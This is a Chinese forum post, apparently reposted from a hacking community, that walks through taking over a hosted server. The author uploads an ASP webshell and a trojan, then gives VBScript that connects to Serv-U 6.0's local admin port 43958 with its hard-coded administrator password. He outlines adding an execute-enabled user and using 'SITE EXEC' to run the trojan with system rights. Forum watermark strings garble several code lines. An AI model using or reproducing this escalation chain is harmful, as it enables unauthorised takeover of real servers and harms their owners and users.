Serv-U 6.0提权新招
前几天,朋友买了一个收费的主页空间,把FTP账号和密码给了我,让我看看安全性如何。老规矩,先用X-Scan扫描,只开了80,21端口,用的是IIS5.0和 Serv-U 6.0,用FTP传个ASP木马上去,FSO开着,可是C、D、E、F没有权限,看都看不了。看来这个管理员是安全意识不错,在网站根目录传个自制木马上去,成功保存在d:\web\wwwroot\webss\muma.exe,可惜执行失败,在ASP木马上了看,原来是关了Wscript.shell权限。
6 K' z5 s. ` p我爱电脑技术社区--打造最好的电脑技术自学交流平台看来别的地方是动不了了,只好试试Serv-U 6.0提升权限了。问题也来了,臭要饭写的提升权限程序只能在本地提升权限,而我在服务器上有没有执行权,传上去也没有用,看来此路不通。 我爱电脑技术论坛: R2 F* x9 v8 W% \8 J; _" R
在服务器上转了几圈,没有发现什么可以利用漏洞,看来还是要靠Serv-U,在硬盘里找了找,远程溢出的程序全失败了……突然,我想到Serv-U 6.0本地提权的本质是在本地连43958端口,那我是不是可以在WebShell里用MSWinsock.Winsock连接呢?只要用账户“localadministrator”,密码“#|@$ak#.|k;0@p”就可以连上去了吧?于是我上网找了找,可惜没有发现这种代码,只好自己写了: 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站( l1 G' z+ R6 |1 m
dim revdata 6 e% B) l& ^1 {8 ?- f
dim sendata 我爱电脑技术论坛: g: y$ ]9 y4 g0 p* E" v
set sock=createobject("MSWinsock.Winsock") 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站; J7 `2 ]6 q* l& D5 Y
sock.Protocol=0 (用TCP) 我爱电脑技术论坛/ n6 w) E5 j* E H* R
sock.Connect "127.0.0.1",43958 , N; k+ y( O0 j1 t4 O
sendata="LocalAdministrator" & chr(10) & chr(13)
, x1 B! i! e( v: @+ Kwww.520diannao.comsock.senddata sendata www.520diannao.com, p, I5 j' G; M! v6 L: l, f
sendata="#|@$ak#.|k;0@p" & chr(10) & chr(13)
2 X) Q1 f3 ]" |* N s/ Y7 @sock.senddata sendata 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站/ x; M+ f) t- @1 m3 X
使用这个代码就能连上FTP了,接下来用Sock.senddata sendata发送添加有执行权限用户的命令,然后想必大家也知道了,用有执行权限的用户连上,再用“SITE EXEC”执行命令,好了,木马启动了,有系统权限了。
! e1 v7 D) I7 X打造最好的电脑自学交流论坛其实,有时候,管理员一个小小的疏忽,就可以导致整个服务器被攻破,可见,安全是一个整体的重要性,这个看似坚固的服务器就这样一来破了。
